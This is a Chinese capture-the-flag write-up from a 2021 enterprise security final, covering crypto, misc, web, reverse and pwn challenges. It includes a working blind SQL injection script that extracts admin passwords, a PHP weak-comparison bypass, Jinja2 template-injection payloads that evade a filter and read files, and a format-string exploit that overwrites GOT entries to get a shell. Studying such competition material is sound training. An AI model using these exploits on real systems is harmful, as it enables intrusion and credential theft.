2021金砖企业信息系统安全决赛

2021年就比完了初赛,但是因为疫情没能办成决赛,今年6月重启了比赛

Crypto

Crypto-1

依次解码:base64 -> base32 -> base64 -> base64

Crypto-2

变种凯撒

上图引用的caesar是自定义的模块

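class caesar:
    """Variant Caesar cipher used for the Crypto-2 solve.

    ``Type`` selects which characters the shift touches:

    * 1 - letters only (A-Z and a-z each wrap within their own 26-letter ring)
    * 2 - decimal digits only (wrap within 0-9)
    * 3 - letters and digits (1 + 2)
    * 4 - every character, shifted within the 7-bit ASCII ring (mod 128)

    ``encode(text, num)`` shifts forward by ``num``.  ``decode(text, num)``
    with a non-zero ``num`` undoes exactly that shift (so
    ``decode(encode(t, k), k) == t``), and ``decode(text)`` brute-forces every
    candidate shift into ``self.delist`` for eyeballing.  Characters outside
    the selected class pass through unchanged.

    Review note: two defects of the original implementation are fixed here.
    Type-4 ``encode`` subtracted 0x30 before the ``% 128`` (a leftover from the
    digit branch), so it was not the inverse of ``decode``; and
    ``decode(text, num)`` returned the *last* brute-force candidate instead of
    the shift the caller asked for.  Ciphertexts produced by the old Type-4
    ``encode`` are therefore off by 0x30 relative to this version.
    """

    _VALID_TYPES = (1, 2, 3, 4)

    def __init__(self):
        self.Type = 1
        self.entext = ""
        self.detext = ""
        self.delist = []

    def setType(self, Type):
        """Select the shift type (1-4); invalid values are reported and ignored."""
        if Type in self._VALID_TYPES:
            self.Type = Type
        else:
            print("Invalid type")

    @staticmethod
    def _shift_char(ch, letter_num, digit_num, letters, digits):
        """Shift one character; *letters*/*digits* say which classes to touch."""
        if letters and ch.isupper():
            return chr((ord(ch) - 65 + letter_num) % 26 + 65)
        if letters and ch.islower():
            return chr((ord(ch) - 97 + letter_num) % 26 + 97)
        if digits and ch.isnumeric():
            return chr((ord(ch) - 0x30 + digit_num) % 10 + 0x30)
        return ch

    def _shift(self, text, num, digit_num=None):
        """Shift *text* forward by *num* under the current Type.

        ``digit_num`` lets Type 3 use a different shift for digits than for
        letters (the brute-force needs that); it defaults to ``num``.  Negative
        values shift backwards because Python's ``%`` result is non-negative.
        """
        if digit_num is None:
            digit_num = num
        if self.Type == 4:
            # Whole 7-bit ASCII ring; non-ASCII input is folded into it as before.
            return "".join(chr((ord(ch) + num) % 128) for ch in text)
        letters = self.Type in (1, 3)
        digits = self.Type in (2, 3)
        return "".join(
            self._shift_char(ch, num, digit_num, letters, digits) for ch in text
        )

    def encode(self, text, num):
        """Shift *text* forward by *num*; the result is also kept in ``self.entext``."""
        self.entext = self._shift(text, num)
        return self.entext

    def decode(self, text, num=0):
        """Undo a shift of *num*, or brute-force all shifts when ``num`` is 0.

        Always refreshes ``self.delist`` with every candidate (26 for Type 1,
        10 for Type 2, 26*10 letter/digit combinations for Type 3 in
        letter-major order, 128 for Type 4); each candidate is *text* shifted
        forward by the candidate amount.  Returns ``self.detext`` (the text
        shifted back by ``num``) when ``num`` is non-zero, otherwise
        ``self.delist``.
        """
        self.delist = []
        self.detext = ""
        if self.Type == 1:
            self.delist = [self._shift(text, j) for j in range(26)]
        elif self.Type == 2:
            self.delist = [self._shift(text, j) for j in range(10)]
        elif self.Type == 3:
            self.delist = [
                self._shift(text, j, k) for j in range(26) for k in range(10)
            ]
        elif self.Type == 4:
            self.delist = [self._shift(text, j) for j in range(128)]
        if num:
            self.detext = self._shift(text, -num)
            return self.detext
        return self.delist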

两次base64得到flag

Crypto-3

先分解 n:题目给出的 p、q 高位完全相同,只相差 534,两个素因子极为接近,用 Fermat 分解法即可快速得到 p、q。

e 和 phi 不互素:令 t = gcd(e, phi),用 e/t 对 phi 求逆得到 d,则 c^d mod n = m^t,再对其开 t 次整数根。注意这一捷径只在 m^t < n 时成立(开根后应验证 root^t == m^t),而且 e/t 与 phi 仍可能不互素。

import gmpy2

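def integer_root(x, k):
    """Return the largest integer r with r**k <= x, using exact integer arithmetic.

    Floats lose precision far below the 2048-bit values involved here, so a
    bisection over the integer range is used instead.
    """
    if x < 0 or k < 1:
        raise ValueError("integer_root needs x >= 0 and k >= 1")
    if x < 2 or k == 1:
        return x
    # 2**ceil(bits/k) raised to k is >= 2**bits > x, so it bounds the root from above.
    lo, hi = 0, 1 << ((x.bit_length() + k - 1) // k)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def recover_plaintext(n, e, c, p, q):
    """Decrypt an RSA ciphertext whose public exponent shares a factor with phi(n).

    Strategy (the one the original script used): let t = gcd(e, phi).  If the
    reduced exponent e/t is invertible mod phi, then c ** d mod n yields
    m ** t.  When m ** t < n that is the plain integer m ** t and an exact
    integer t-th root gives m back.

    Args:
        n, e, c: public modulus, public exponent, ciphertext.
        p, q: the two prime factors of n.
    Returns:
        The plaintext as big-endian bytes.
    Raises:
        ValueError: if e/t is still not coprime to phi (happens when some prime
            divides e with higher multiplicity than it divides phi), or if
            m ** t >= n so the t-th root is not exact and this shortcut does
            not apply (a proper modular root, e.g. AMM + CRT, would be needed).
    """
    from math import gcd

    phi = n - p - q + 1  # (p - 1) * (q - 1) for n = p * q
    t = gcd(e, phi)
    e_reduced = e // t
    if gcd(e_reduced, phi) != 1:
        raise ValueError("e // gcd(e, phi) is still not invertible mod phi")
    d = pow(e_reduced, -1, phi)  # modular inverse, Python 3.8+
    m_to_t = pow(c, d, n)
    m = integer_root(m_to_t, t)
    if m ** t != m_to_t:
        raise ValueError("m**t is not an exact integer root (m**t >= n); shortcut fails")
    # to_bytes avoids the odd-length-hex failure of bytes.fromhex(hex(m)[2:]).
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


n = 22418636922065508104264650472638100390507346675022700253583060418349386472260539292033574216754214047540225287240029292436219548116787251605020424767984000804727346173028308816952737183433110999995264950414364145519999339949396799207404153148796900954086093431917244453864253649011176295266497073733547832171165497506613139960587280135867463235266546869960044777350378595302570142110464582590415694749192915651700844268466357439219626769665355230647219887042871785185100743750953935872489085346311527806979246650668966304323450610041756764667276881295676841136337294903126776228640645138477063815764467811948872156311
e = 180
c = 17971123746814947059314270113966290245749007752378241906733564181493060407114219968936077930494933520528427074831694818994710527963410153282657079091353179846750982127804195747725871635911272654572811618799762595633801414107052800867035212498914627567940429340162711284873714117628807667324064684965941290688518710890089086623981356782977499005308798890348799101436318386502089586589964942282091818134339082321114129830959264557408611168516265190076744300272908807347811446203373025446057616713876047942653095947804696077860211107853183353180163392501353685418796451123620066941329424857070023018877454625734091037559
q = 149728544112555599590936673615696271318636529352637830106348687941183054498250042553549708433208468004536400117026086238076264785396396599290721801532887662723160698502186620809003309343021490868380464762486274154096814166441270611631342173101926176645742035350917214925625954628200341278782929951624259583527
p = 149728544112555599590936673615696271318636529352637830106348687941183054498250042553549708433208468004536400117026086238076264785396396599290721801532887662723160698502186620809003309343021490868380464762486274154096814166441270611631342173101926176645742035350917214925625954628200341278782929951624259582993

if __name__ == "__main__":
    # Guarded so importing this file does not redo the computation (the original ran it at import).
    print(recover_plaintext(n, e, c, p, q))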

Crypto-4

ADFGVX解密
百度得到原题

Misc

Misc-1

直接strings

Misc-2

binwalk分解出一堆zlib文件
对非 zlib 的文件执行 strings(`ls | grep -v zlib | xargs strings`),可以在输出结尾发现一串字符串
两次base64后得到flag

Misc-3

文件尾发现提示字符串 "did you try lsb?"(暗示 LSB 隐写)
stegsolve发现ff d8,另存为jpg

十六进制模式下发现一串字符串

base64解密后得到flag

Misc-4

音频文件,播放后具有非常明显的sstv特征
在手机上使用robot36监听得到flag

WEB

Web-1

在js中可以看到游戏的逻辑

访问23881361B86C77CD.php,点击key在这里会跳转,抓包,在返回值中得到flag

Web-2

存在简单过滤的 SQL 布尔盲注:用 `1'^(条件)^'1` 把条件的真假映射到登录回显,逐字符二分猜解
exp:

import requests
import urllib.parse
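# Request headers copied from the author's browser. The Cookie is only CNZZ
# analytics tracking cruft and plays no role in the injection; it is kept so
# the requests look exactly like the original ones.
_DEFAULT_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
    'Cookie': "UM_distinctid = 175b18dcb384ba-0f290792fb4f06-230346d-144000-175b18dcb39493;CNZZDATA1261218610 =1200642698-1605001662-%7C1605366994",
    "Content-Type": "application/x-www-form-urlencoded",
}

# Search floor; a result equal to it means "space or past the end of the data".
_SEARCH_LOW = 32
_SEARCH_HIGH = 128


def _binary_search_byte(is_greater, low=_SEARCH_LOW, high=_SEARCH_HIGH):
    """Return the smallest v in [low, high] for which ``is_greater(v)`` is False.

    ``is_greater(v)`` answers "is the hidden byte strictly greater than v?".
    When the hidden byte lies in [low, high) the answer is that byte; when
    every probe is False (substring past the end, where ascii() yields 0/NULL)
    the answer is ``low``.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def _http_oracle(url, headers):
    """Build the default oracle: POST the injected uname and read the response text."""
    def oracle(uname):
        data = {
            'uname': uname,
            'passwd': "1",
        }
        r = requests.post(url=url, data=data, headers=headers)
        # In this challenge '1'^(cond)^'1' collapses to cond, and the
        # "user does not exist" page was observed whenever cond was true.
        return '不存在此用户' in r.text
    return oracle


def sqlinjet(url, payload, *, oracle=None, max_len=100):
    """Boolean-blind extraction, one character at a time, by binary search over ASCII 32..127.

    Args:
        url: login endpoint to POST to (used only by the default HTTP oracle).
        payload: format string with two ``{}`` slots - the 1-based character
            position and the threshold - producing an "ascii(char) > threshold"
            condition.
        oracle: optional callable ``uname -> bool`` that returns True when the
            injected condition held; defaults to an HTTP oracle against ``url``.
            Mainly useful for testing the search logic offline.
        max_len: upper bound on the number of characters extracted.
    Returns:
        The recovered string.  Extraction stops at the first position that
        resolves to 32 (a space, or a position past the end of the data - the
        original's stop condition); unlike the original, that sentinel is not
        appended to the result.  The original also tested ``mid == 132``,
        which could never happen with a search ceiling of 128.
    """
    if oracle is None:
        oracle = _http_oracle(url, _DEFAULT_HEADERS)
    flag = ''
    for pos in range(1, max_len + 1):
        ch = _binary_search_byte(lambda v: oracle(payload.format(pos, v)))
        if ch == _SEARCH_LOW:
            break
        flag += chr(ch)
        print(flag)
    return flag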

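url = 'http://101.133.132.222:8002/login.php'
# Unused placeholder kept from the original.
payload_all_database = ""
# Each probe is "1'^(ascii(substring(<query>) from {pos})) > {threshold})^'1":
# the XOR chain collapses to the comparison, so the login response reveals
# whether the character at {pos} is greater than {threshold}.
payload_database = "1'^(ascii(substring((select(database()))from({})))>{})^'1"
payload_table = "1'^(ascii(substring((select(group_concat(table_name))from(sys.schema_auto_increment_columns)where(table_schema=database()))from({})))>{})^'1"

uname = "1'^(ascii(substring((select(group_concat(uname))from(admin))from({})))>{})^'1"
password = "1'^(ascii(substring((select(group_concat(passwd))from(admin))from({})))>{})^'1"

if __name__ == "__main__":
    # Guarded so that importing this module does not fire requests at the target.
    sqlinjet(url, password)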

注入得到密码的 md5 值(md5 不可逆,需查表反查),反查得到明文 5555666

登录拿到flag

Web-4

扫描目录得到index.php.bak

得到部分源代码

md5($_GET['name']) == md5($_GET['pwd'])

PHP 弱类型比较(==):md5() 收到数组时返回 NULL(并给出 warning),两个参数都传数组则 NULL == NULL 为真,即可绕过

payload:
http://101.133.132.222:8004/index.php?name[]=admin&pwd[]=admin123

Web-5

题目url后的路径可控,会直接回显出来
尝试 XSS 和 SSTI
存在 XSS 但不易利用;用 {{7*7}} 测试(回显为 49 即说明表达式被模板引擎渲染),确认存在 SSTI

报错后得到框架是jinja2

fuzz 后发现过滤了 class 关键字,可以通过字符串拼接('__cla'+'ss__')并用 [] 下标访问属性来绕过

先获取FileLoader
http://101.133.132.222:8005/{{()['__cla'+'ss__'].__base__['__subclas'+'ses__']()}}

调用该类的 get_data 方法读文件。注意 __subclasses__() 中的下标 79 取决于目标环境的 Python 版本和已加载的库,应先在上一步列出的子类中确认 FileLoader 的实际位置,再替换下标。
http://101.133.132.222:8005/{{()['__cla'+'ss__'].__base__['__subclas'+'ses__']()[79]["get_data"](0,"/flag")}}

Reverse

Reverse-1

直接strings

PWN

Pwn-1

查看代码发现main函数中存在两次格式化字符串

通过第一次格式化字符串(%43$p)泄漏栈上位于 __libc_start_main 内的返回地址,减去固定偏移 240 得到 __libc_start_main 的地址
同时获取libc地址,通过libc获取system函数地址

通过第二次格式化字符串把 .fini_array 中的项改写为 main 的地址(只需改写低 3 字节),程序退出时会再次执行 main
使我们可以再次输入数据,并把printf函数在got表中的数据修改为system函数地址
这样在第二次执行 main 时,输入 /bin/sh 就会让 printf 实际调用 system("/bin/sh") 拿到 shell

exp

from pwn import *
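# Challenge-specific constants (from the original exploit).
LIBC_START_MAIN_RET_OFFSET = 240  # the leaked value is a return address inside __libc_start_main
FINI_ARRAY = 0x600a78             # .fini_array entry that is rewritten to point back at main
MAIN_ADDR = 0x400797
# The original placed the target addresses at payload offset 0xa0 and reached
# them as positional parameters 28, 29, ... (stack layout of this binary).
FMT_ARG_INDEX = 28
FMT_ADDR_OFFSET = 0xa0


def le_bytes(value):
    """Little-endian bytes of *value* with the most-significant zero bytes dropped.

    Mirrors the original ``while i != 0`` loop: a 3-byte address gives 3 bytes,
    a 6-byte libc address gives 6, and 0 gives no bytes at all.
    """
    return value.to_bytes((value.bit_length() + 7) // 8, 'little')


def fmt_hhn_writes(writes, first_index=FMT_ARG_INDEX, pad_to=FMT_ADDR_OFFSET):
    """Build a printf format-string payload that performs single-byte writes.

    Args:
        writes: iterable of ``(address, byte_value)`` pairs, 0 <= byte_value <= 255.
        first_index: positional parameter under which the first packed address
            is reachable; the i-th address is referenced as ``first_index + i``.
        pad_to: offset in the payload at which the packed addresses start.
    Returns:
        ``bytes``: the ``%Nc%k$hhn`` directives, padded with ``b'a'`` to
        ``pad_to``, followed by the target addresses packed as little-endian
        qwords in the order the directives reference them.
    Raises:
        ValueError: on a byte value outside 0..255 or if the directives do not
            fit before ``pad_to``.

    Writes are sorted by byte value so the running character count only ever
    grows; for equal values no extra ``%Nc`` is emitted.  The original keyed
    a dict by byte value, so two targets needing the same byte collided and
    one of the writes was silently lost; its leading ``%0c`` for a zero byte
    would also have printed one character instead of none.
    """
    import struct

    ordered = sorted(writes, key=lambda w: w[1])
    directives = []
    printed = 0
    for i, (addr, value) in enumerate(ordered):
        if not 0 <= value <= 0xff:
            raise ValueError("byte value out of range: %r" % (value,))
        if value != printed:
            directives.append(b'%%%dc' % (value - printed))
            printed = value
        directives.append(b'%%%d$hhn' % (first_index + i))
    fmt = b''.join(directives)
    if len(fmt) > pad_to:
        raise ValueError("format directives (%d bytes) overflow the address slot at %#x" % (len(fmt), pad_to))
    return fmt.ljust(pad_to, b'a') + b''.join(struct.pack('<Q', addr) for addr, _ in ordered)


def main():
    """Leak libc, then rewrite .fini_array -> main and printf@GOT -> system."""
    libc = ELF('libc-2.23.so', checksec=0)
    binary = ELF('./pmagic', checksec=0)
    io = remote('106.14.91.65', 10000)
    # io = process('./pmagic')
    # gdb.attach(io, 'b *0x400838')

    # First format string: leak a return address inside __libc_start_main.
    io.recvuntil(b'name.\n')
    io.send(b'%43$p')
    leaked_ret = int(io.recvuntil(b'Say', drop=True)[:-1], 16)
    libc.address = leaked_ret - LIBC_START_MAIN_RET_OFFSET - libc.sym['__libc_start_main']
    system = libc.sym['system']
    printf_got = binary.got['printf']
    print(hex(MAIN_ADDR))
    print(hex(FINI_ARRAY))
    print(hex(system))
    print(hex(printf_got))

    # Second format string: low 3 bytes of main into .fini_array, system into printf@GOT.
    writes = list(zip(range(FINI_ARRAY, FINI_ARRAY + 8), le_bytes(MAIN_ADDR)))
    writes += list(zip(range(printf_got, printf_got + 8), le_bytes(system)))
    payload = fmt_hhn_writes(writes)
    print(hex(len(payload)))
    print(payload)
    io.sendline(payload)

    # main runs again via .fini_array; sending "/bin/sh" now reaches system().
    io.interactive()


if __name__ == "__main__":
    main()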

